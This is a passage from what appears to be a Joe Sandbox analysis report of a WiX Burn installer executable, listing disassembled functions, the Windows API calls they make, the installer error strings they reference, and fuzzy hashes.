                                                              • Part of subcall function 008854DC: WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0087452F,?,008BB500), ref: 00885607
                                                              • Part of subcall function 008B0A28: WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 008B0A38
                                                              • Part of subcall function 008B0A28: GetLastError.KERNEL32(?,?,00874F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 008B0A46
                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0089CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0089CE41
                                                            • CloseHandle.KERNEL32(00000000,?,000000FF,00000000,?,0089CBEF,?,?,?,?,?,00000000,?,?,?,?), ref: 0089CE50
                                                            • CloseHandle.KERNEL32(00000000,?,?,000000FF,00000000,?,0089CBEF,?,?,?,?,?,00000000,?,?,?), ref: 0089CE67
                                                            Strings
                                                            • Failed to create embedded pipe., xrefs: 0089CD27
                                                            • Failed to create embedded pipe name and client token., xrefs: 0089CD00
                                                            • Failed to wait for embedded process to connect to pipe., xrefs: 0089CDDF
                                                            • Failed to process messages from embedded message., xrefs: 0089CE04
                                                            • Failed to wait for embedded executable: %ls, xrefs: 0089CE24
                                                            • Failed to create embedded process at path: %ls, xrefs: 0089CDB3
                                                            • %ls -%ls %ls %ls %u, xrefs: 0089CD40
                                                            • Failed to allocate embedded command., xrefs: 0089CD54
                                                            • burn.embedded, xrefs: 0089CD38
                                                            • embedded.cpp, xrefs: 0089CDA6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Handle$Process$CloseErrorFileLastNamedPipeWrite$CreateCurrentState$ConnectObjectSingleSleepUuidWaitlstrlen
                                                            • String ID: %ls -%ls %ls %ls %u$Failed to allocate embedded command.$Failed to create embedded pipe name and client token.$Failed to create embedded pipe.$Failed to create embedded process at path: %ls$Failed to process messages from embedded message.$Failed to wait for embedded executable: %ls$Failed to wait for embedded process to connect to pipe.$burn.embedded$embedded.cpp
                                                            • API String ID: 875070380-3803182736
                                                            • Opcode ID: 32db505c0e415eef91701b9b531a290e8f5a750c89e06c337fc15cf967736d6c
                                                            • Instruction ID: f27057de8b4adee35875d193e737f98367e10b7a977f1279fe0d9ebadd30db1c
                                                            • Opcode Fuzzy Hash: 32db505c0e415eef91701b9b531a290e8f5a750c89e06c337fc15cf967736d6c
                                                            • Instruction Fuzzy Hash: A2516D72D4122DBBDF12AA98DC06BEEBBB8FB04710F144122FA01F6291D7759A409BD1
                                                            Function 0087ECBE Relevance: 29.9, APIs: 2, Strings: 15, Instructions: 173COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysFreeString.OLEAUT32(?), ref: 0087EE4C
                                                              • Part of subcall function 0087394F: GetProcessHeap.KERNEL32(?,000001C7,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873960
                                                              • Part of subcall function 0087394F: RtlAllocateHeap.NTDLL(00000000,?,00872274,000001C7,00000001,80004005,8007139F,?,?,008B0267,8007139F,?,00000000,00000000,8007139F), ref: 00873967
                                                            • SysFreeString.OLEAUT32(?), ref: 0087EE04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: FreeHeapString$AllocateProcess
                                                            • String ID: Failed to allocate memory for software tag structs.$Failed to convert SoftwareTag text to UTF-8$Failed to get @Filename.$Failed to get @Path.$Failed to get @Regid.$Failed to get SoftwareTag text.$Failed to get next node.$Failed to get software tag count.$Failed to select software tag nodes.$Filename$Path$Regid$SoftwareTag$`<u$registration.cpp
                                                            • API String ID: 336948655-956346883
                                                            • Opcode ID: fa8ffe40078a4768df898a9cc9d21357a5d0b977585d3301d5702d7dfe953412
                                                            • Instruction ID: 21a55ddfb9b27ac2120c5b0e56849a7c4f71e23d9254b36dbf0247cd2c4f3498
                                                            • Opcode Fuzzy Hash: fa8ffe40078a4768df898a9cc9d21357a5d0b977585d3301d5702d7dfe953412
                                                            • Instruction Fuzzy Hash: FB519436A0162ABBCB11DF58C885EAEBBB4FF08710B1485A9B919EB345C770DE009791
                                                            Function 008B7F7E Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 153stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CompareStringW.KERNEL32(0000007F,00000000,msi.dll,000000FF,http://appsyndication.org/2006/appsyn,000000FF,00000000,00000000,000002C0,?,008B8468,00000001,?), ref: 008B7F9E
                                                            • CompareStringW.KERNEL32(0000007F,00000000,digest,000000FF,002E0069,000000FF,?,008B8468,00000001,?), ref: 008B7FB9
                                                            • CompareStringW.KERNEL32(0000007F,00000000,name,000000FF,002E0069,000000FF,?,008B8468,00000001,?), ref: 008B7FD4
                                                            • CompareStringW.KERNEL32(0000007F,00000000,algorithm,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B8040
                                                            • CompareStringW.KERNEL32(0000007F,00000001,md5,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B8064
                                                            • CompareStringW.KERNEL32(0000007F,00000001,sha1,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B8088
                                                            • CompareStringW.KERNEL32(0000007F,00000001,sha256,000000FF,?,000000FF,?,008B8468,00000001,?), ref: 008B80A8
                                                            • lstrlenW.KERNEL32(006C0064,?,008B8468,00000001,?), ref: 008B80C3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CompareString$lstrlen
                                                            • String ID: algorithm$apuputil.cpp$digest$http://appsyndication.org/2006/appsyn$md5$msi.dll$name$sha1$sha256
                                                            • API String ID: 1657112622-2492263259
                                                            • Opcode ID: bfef9f286555ce4d3c637180ff4fb781236f1cffbe0305af751f4b3f9741edd6
                                                            • Instruction ID: 8ad22da27ff74dbc071ede616df4f7dfa17d2d75fec16c67ba97efd42c0aabb8
                                                            • Opcode Fuzzy Hash: bfef9f286555ce4d3c637180ff4fb781236f1cffbe0305af751f4b3f9741edd6
                                                            • Instruction Fuzzy Hash: 2D519D31688612FADB205E488C41FA67B66FB15770F208305FA34EE3E5DBB5E851CB90
                                                            Function 0087A03E Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 215COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A0B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16
                                                            • String ID: AssignmentType$Failed to change value type.$Failed to copy upgrade code.$Failed to enumerate related products for upgrade code.$Failed to format GUID string.$Failed to get product info.$Failed to set variable.$Language$MsiProductSearch failed: ID '%ls', HRESULT 0x%x$Product or related product not found: %ls$State$Trying per-machine extended info for property '%ls' for product: %ls$Trying per-user extended info for property '%ls' for product: %ls$Unsupported product search type: %u$VersionString
                                                            • API String ID: 3613110473-2134270738
                                                            • Opcode ID: 9efd7812bd2a2fe7815b50a4e98d1e8755644d3a9bda5252ddc35ebbeb14dcae
                                                            • Instruction ID: 0932ec0ec5077683b5aeaa84bec1651e821c428ae0c008069c32308e9a56c3bc
                                                            • Opcode Fuzzy Hash: 9efd7812bd2a2fe7815b50a4e98d1e8755644d3a9bda5252ddc35ebbeb14dcae
                                                            • Instruction Fuzzy Hash: 5861F532D40118FFCB199AA8CD45DEE7B78FB84714F208065F919FA356D232DE009B92
                                                            Function 00884B2A Relevance: 28.2, APIs: 7, Strings: 9, Instructions: 158sleepfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?), ref: 00884B84
                                                            • GetLastError.KERNEL32 ref: 00884B92
                                                            • Sleep.KERNEL32(00000064), ref: 00884BB6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CreateErrorFileLastSleep
                                                            • String ID: Failed to allocate name of parent cache pipe.$Failed to allocate name of parent pipe.$Failed to open companion process with PID: %u$Failed to open parent pipe: %ls$Failed to verify parent pipe: %ls$\\.\pipe\%ls$\\.\pipe\%ls.Cache$feclient.dll$pipe.cpp
                                                            • API String ID: 408151869-3212458075
                                                            • Opcode ID: 838dc4304b662314e259cdc17a24186b6dce2feea2f58990e9ef784994778efb
                                                            • Instruction ID: 2258ef2369ee53a567b8d16bf6355e3169859c88ddbf8f3c4ed83509424c24cf
                                                            • Opcode Fuzzy Hash: 838dc4304b662314e259cdc17a24186b6dce2feea2f58990e9ef784994778efb
                                                            • Instruction Fuzzy Hash: 7D41E037D82637BBDB2166E48D06F5A7A68FB10720F111221FE10FA290D775ED4097D5
                                                            Function 0087F585 Relevance: 28.2, APIs: 1, Strings: 15, Instructions: 152registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegCloseKey.ADVAPI32(00000000,00000000,008804DF,InstallerVersion,InstallerVersion,00000000,008804DF,InstallerName,InstallerName,00000000,008804DF,Date,InstalledDate,00000000,008804DF,LogonUser), ref: 0087F733
                                                              • Part of subcall function 008B14F4: RegSetValueExW.ADVAPI32(00020006,008C0D10,00000000,00000001,?,00000000,?,000000FF,00000000,00000000,?,?,0087F335,00000000,?,00020006), ref: 008B1527
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseValue
                                                            • String ID: Date$Failed to create the key for update registration.$Failed to get the formatted key path for update registration.$Failed to write %ls value.$InstalledBy$InstalledDate$InstallerName$InstallerVersion$LogonUser$PackageName$PackageVersion$Publisher$PublishingGroup$ReleaseType$ThisVersionInstalled
                                                            • API String ID: 3132538880-2703781546
                                                            • Opcode ID: e3aa8359b13ce3dee8825b50fc6a87b33cba0a27c8d540e21802980a76d29f3a
                                                            • Instruction ID: e0fa73940c491ec07aceb89de45706f5588d4e8859588ba3f135fcd7b248d54a
                                                            • Opcode Fuzzy Hash: e3aa8359b13ce3dee8825b50fc6a87b33cba0a27c8d540e21802980a76d29f3a
                                                            • Instruction Fuzzy Hash: 0E41E532A406A6BBCF136659CC02FEE7A75FB10B54B148175FA08F63A7C774DE10A681
                                                            Function 0088E7B4 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 137registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • TlsSetValue.KERNEL32(?,?), ref: 0088E7FF
                                                            • RegisterClassW.USER32(?), ref: 0088E82B
                                                            • GetLastError.KERNEL32 ref: 0088E836
                                                            • CreateWindowExW.USER32(00000080,008C9E54,00000000,90000000,80000000,00000008,00000000,00000000,00000000,00000000,?,?), ref: 0088E89D
                                                            • GetLastError.KERNEL32 ref: 0088E8A7
                                                            • UnregisterClassW.USER32(WixBurnMessageWindow,?), ref: 0088E945
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: ClassErrorLast$CreateRegisterUnregisterValueWindow
                                                            • String ID: Failed to create window.$Failed to register window.$Unexpected return value from message pump.$WixBurnMessageWindow$uithread.cpp
                                                            • API String ID: 213125376-288575659
                                                            • Opcode ID: 51509807a2c76210dcb2928e2ae53f1613ecdb05f184aa1b8f742b57ab32b0d7
                                                            • Instruction ID: 6692e92d4d98d1dfd8ad201f9b8577b711531defc563db3345ab7660c0f01944
                                                            • Opcode Fuzzy Hash: 51509807a2c76210dcb2928e2ae53f1613ecdb05f184aa1b8f742b57ab32b0d7
                                                            • Instruction Fuzzy Hash: 82418372900229EBDB20ABA5DC49BDEBFB8FF08750F114165F915FB250D7B0A944CBA1
                                                            Function 0089C774 Relevance: 26.5, APIs: 1, Strings: 14, Instructions: 272COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • Failed to copy filename for passthrough pseudo bundle., xrefs: 0089C9BE
                                                            • Failed to copy cache id for passthrough pseudo bundle., xrefs: 0089CA05
                                                            • Failed to copy install arguments for passthrough bundle package, xrefs: 0089CA62
                                                            • pseudobundle.cpp, xrefs: 0089C7A8, 0089C9A1, 0089C9DB
                                                            • Failed to copy key for passthrough pseudo bundle., xrefs: 0089C988
                                                            • Failed to allocate space for burn payload inside of related bundle struct, xrefs: 0089C9E7
                                                            • Failed to copy key for passthrough pseudo bundle payload., xrefs: 0089C9C5
                                                            • Failed to copy local source path for passthrough pseudo bundle., xrefs: 0089C9B7
                                                            • Failed to copy related arguments for passthrough bundle package, xrefs: 0089CA82
                                                            • Failed to allocate memory for pseudo bundle payload hash., xrefs: 0089C9AD
                                                            • Failed to allocate space for burn package payload inside of passthrough bundle., xrefs: 0089C7B4
                                                            • Failed to recreate command-line arguments., xrefs: 0089CA43
                                                            • Failed to copy download source for passthrough pseudo bundle., xrefs: 0089C98F
                                                            • Failed to copy uninstall arguments for passthrough bundle package, xrefs: 0089CAAC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Heap$AllocateProcess
                                                            • String ID: Failed to allocate memory for pseudo bundle payload hash.$Failed to allocate space for burn package payload inside of passthrough bundle.$Failed to allocate space for burn payload inside of related bundle struct$Failed to copy cache id for passthrough pseudo bundle.$Failed to copy download source for passthrough pseudo bundle.$Failed to copy filename for passthrough pseudo bundle.$Failed to copy install arguments for passthrough bundle package$Failed to copy key for passthrough pseudo bundle payload.$Failed to copy key for passthrough pseudo bundle.$Failed to copy local source path for passthrough pseudo bundle.$Failed to copy related arguments for passthrough bundle package$Failed to copy uninstall arguments for passthrough bundle package$Failed to recreate command-line arguments.$pseudobundle.cpp
                                                            • API String ID: 1357844191-115096447
                                                            • Opcode ID: 8f3faa96838627fa9678870a795556b91639b8f7c749a39ba5b54ec40ea1dc4e
                                                            • Instruction ID: 9f18ece10a78feeb0a07d6c3d5211aa5817927ac6f1c5abbfe5fcc200b1ff532
                                                            • Opcode Fuzzy Hash: 8f3faa96838627fa9678870a795556b91639b8f7c749a39ba5b54ec40ea1dc4e
                                                            • Instruction Fuzzy Hash: 28B15875A4061AEFDB11EF68C881F55BBA1FF08710F148269ED18EB352CB32E811DB91
                                                            Function 0089DE46 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 204stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,?,00000000,00000000), ref: 0089DE61
                                                            Strings
                                                            • Invalid BITS engine URL: %ls, xrefs: 0089DE83
                                                            • Failed while waiting for BITS download., xrefs: 0089E012
                                                            • Failed to create BITS job., xrefs: 0089DEF0
                                                            • Failed to copy download URL., xrefs: 0089DEA8
                                                            • Failed to complete BITS job., xrefs: 0089E00B
                                                            • Failed to create BITS job callback., xrefs: 0089DF74
                                                            • Falied to start BITS job., xrefs: 0089E019
                                                            • Failed to set credentials for BITS job., xrefs: 0089DF0F
                                                            • Failed to download BITS job., xrefs: 0089DFF8
                                                            • bitsengine.cpp, xrefs: 0089DE77, 0089DF6A
                                                            • Failed to add file to BITS job., xrefs: 0089DF2E
                                                            • Failed to initialize BITS job callback., xrefs: 0089DF82
                                                            • Failed to set callback interface for BITS job., xrefs: 0089DF99
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: Failed to add file to BITS job.$Failed to complete BITS job.$Failed to copy download URL.$Failed to create BITS job callback.$Failed to create BITS job.$Failed to download BITS job.$Failed to initialize BITS job callback.$Failed to set callback interface for BITS job.$Failed to set credentials for BITS job.$Failed while waiting for BITS download.$Falied to start BITS job.$Invalid BITS engine URL: %ls$bitsengine.cpp
                                                            • API String ID: 1659193697-2382896028
                                                            • Opcode ID: 463f447d574b690db64230819cab358255a65a59ad2ff7bfdd42e8e8afe348fe
                                                            • Instruction ID: e3b8a177dbcd3963fdc9c8cc0d30ed426789a9df212d60b9ced92fbd5f589b2e
                                                            • Opcode Fuzzy Hash: 463f447d574b690db64230819cab358255a65a59ad2ff7bfdd42e8e8afe348fe
                                                            • Instruction Fuzzy Hash: 0A61B131A40725EBCF11AB98C885E6E7FA4FF08720B194256FC05EB351DBB4DD009B95
                                                            Function 0087BC93 Relevance: 26.4, APIs: 6, Strings: 9, Instructions: 190processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087BCE5
                                                            • CreateProcessW.KERNEL32(?,?,00000000,00000000,00000000,00000200,00000000,?,00000044,?,?,?,?,?), ref: 0087BDF2
                                                            • GetLastError.KERNEL32(?,?,?,?), ref: 0087BDFC
                                                            • WaitForInputIdle.USER32(?,?), ref: 0087BE50
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0087BE9B
                                                            • CloseHandle.KERNEL32(?,?,?), ref: 0087BEA8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle$CreateErrorIdleInputLastOpen@16ProcessWait
                                                            • String ID: "%ls"$"%ls" %s$D$Failed to CreateProcess on path: %ls$Failed to create executable command.$Failed to create obfuscated executable command.$Failed to format argument string.$Failed to format obfuscated argument string.$approvedexe.cpp
                                                            • API String ID: 155678114-2737401750
                                                            • Opcode ID: 9a78f184cd9df29e9887f0e0d98ed7e8a2444130d3caa8a70e6b8f88cf44f6cb
                                                            • Instruction ID: 731407913fa934389fbdd5c677f20d6ac6a3b5a2483b782358432e702b54684a
                                                            • Opcode Fuzzy Hash: 9a78f184cd9df29e9887f0e0d98ed7e8a2444130d3caa8a70e6b8f88cf44f6cb
                                                            • Instruction Fuzzy Hash: FF514C72D0061ABBCF22AF98CC41AEEBB7AFF14300B148565FA18F2215D731DE509B91
                                                            Function 008969D2 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 153serviceCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,00000000,?,?,?,?,?,?,?,?,00896F28,?), ref: 00896A0B
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896A18
                                                            • OpenServiceW.ADVAPI32(00000000,wuauserv,00000027,?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896A60
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896A6C
                                                            • QueryServiceStatus.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896AA6
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00896F28,?,?,?), ref: 00896AB0
                                                            • CloseServiceHandle.ADVAPI32(00000000), ref: 00896B67
                                                            • CloseServiceHandle.ADVAPI32(?), ref: 00896B71
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Service$ErrorLast$CloseHandleOpen$ManagerQueryStatus
                                                            • String ID: Failed to mark WU service to start on demand.$Failed to open WU service.$Failed to open service control manager.$Failed to query status of WU service.$Failed to read configuration for WU service.$msuengine.cpp$wuauserv
                                                            • API String ID: 971853308-301359130
                                                            • Opcode ID: 49a04b49afe2b97c548a6557e0cbd8511f5b16106b20a4bb22b9023f6912af28
                                                            • Instruction ID: be53e5b14c244541d9e1e8fef91736e6a1600659c2cd6b4dc14f65b64e91297b
                                                            • Opcode Fuzzy Hash: 49a04b49afe2b97c548a6557e0cbd8511f5b16106b20a4bb22b9023f6912af28
                                                            • Instruction Fuzzy Hash: 89418572A407359BDB11BAA88C85EAEB7F4FF04720B198139FD15FB241F674DC1186A1
                                                            Function 0087A28B Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 138registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A2B3
                                                            • _MREFOpen@16.MSPDB140-MSVCRT ref: 0087A30E
                                                            • RegQueryValueExW.ADVAPI32(000002C0,00000100,00000000,000002C0,00000000,00000000,000002C0,?,00000100,00000000,?,00000000,?,000002C0,000002C0,?), ref: 0087A32F
                                                            • RegCloseKey.ADVAPI32(00000000,00000100,00000000,000002C0,00000100,00000000,000002C0), ref: 0087A405
                                                            Strings
                                                            • RegistrySearchExists failed: ID '%ls', HRESULT 0x%x, xrefs: 0087A3DD
                                                            • search.cpp, xrefs: 0087A360
                                                            • Failed to format value string., xrefs: 0087A319
                                                            • Failed to format key string., xrefs: 0087A2BE
                                                            • Failed to open registry key. Key = '%ls', xrefs: 0087A3C7
                                                            • Failed to set variable., xrefs: 0087A3BD
                                                            • Failed to query registry key value., xrefs: 0087A36A
                                                            • Registry value not found. Key = '%ls', Value = '%ls', xrefs: 0087A37A
                                                            • Registry key not found. Key = '%ls', xrefs: 0087A396
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1728927269.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true
                                                            • Associated: 00000000.00000002.1728901900.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728965168.00000000008BB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1728991586.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1729008978.00000000008DD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_870000_KClGcCpDAP.jbxd
                                                            Similarity
                                                            • API ID: Open@16$CloseQueryValue
                                                            • String ID: Failed to format key string.$Failed to format value string.$Failed to open registry key. Key = '%ls'$Failed to query registry key value.$Failed to set variable.$Registry key not found. Key = '%ls'$Registry value not found. Key = '%ls', Value = '%ls'$RegistrySearchExists failed: ID '%ls', HRESULT 0x%x$search.cpp
                                                            • API String ID: 2702208347-46557908
                                                            • Opcode ID: 56341862546df3a1bac90757fcdf0b775c191c9ff1ed601c513e93c401157a1a
                                                            • Instruction ID: 9709dd59169475ea40906bc1efd4e1d17840bcaacbcf389a9b5d7bf389644444
                                                            • Opcode Fuzzy Hash: 56341862546df3a1bac90757fcdf0b775c191c9ff1ed601c513e93c401157a1a
                                                            • Instruction Fuzzy Hash: EE41C532D40128BFDB169E98CC46FEFBA64FB44710F108261B818F6396D675DE10AB92
                                                            Function 0087B208 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 137COMMON
                                                            Download Yara Rule
